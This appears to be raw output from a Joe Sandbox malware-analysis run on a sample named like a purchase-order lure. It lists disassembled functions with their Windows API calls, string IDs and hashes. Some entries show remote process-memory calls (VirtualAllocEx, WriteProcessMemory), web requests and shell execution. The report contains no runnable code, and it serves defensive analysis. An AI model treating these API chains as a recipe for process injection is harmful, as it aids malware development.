                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                            • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                            • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                            • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                            • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                            • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                            • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 708495834-557222456
                                                            • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                            • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                            • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                            • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                            APIs
                                                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                            • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                            • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                            • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \$]$h
                                                            • API String ID: 4104443479-3262404753
                                                            • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                            • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                            • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                            • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                            APIs
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • CloseHandle.KERNEL32(?), ref: 00457E09
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                            • String ID: <$@
                                                            • API String ID: 2417854910-1426351568
                                                            • Opcode ID: 2f98286fc2dd11665d4ada5f863c78d92abc4f9667931209338d93a07fbf086c
                                                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                            • Opcode Fuzzy Hash: 2f98286fc2dd11665d4ada5f863c78d92abc4f9667931209338d93a07fbf086c
                                                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3705125965-3916222277
                                                            • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                            • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                            APIs
                                                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: 0
                                                            • API String ID: 135850232-4108050209
                                                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: AU3_GetPluginDetails
                                                            • API String ID: 145871493-4132174516
                                                            • Opcode ID: dcd865906ac5040e6418ceb55575901707d9396e778d7393d7920faf26aa26a4
                                                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                            • Opcode Fuzzy Hash: dcd865906ac5040e6418ceb55575901707d9396e778d7393d7920faf26aa26a4
                                                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 3375834691-2298589950
                                                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: $<
                                                            • API String ID: 4104443479-428540627
                                                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                            • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                            • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                            • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                            Strings
                                                            Memory Dump Source
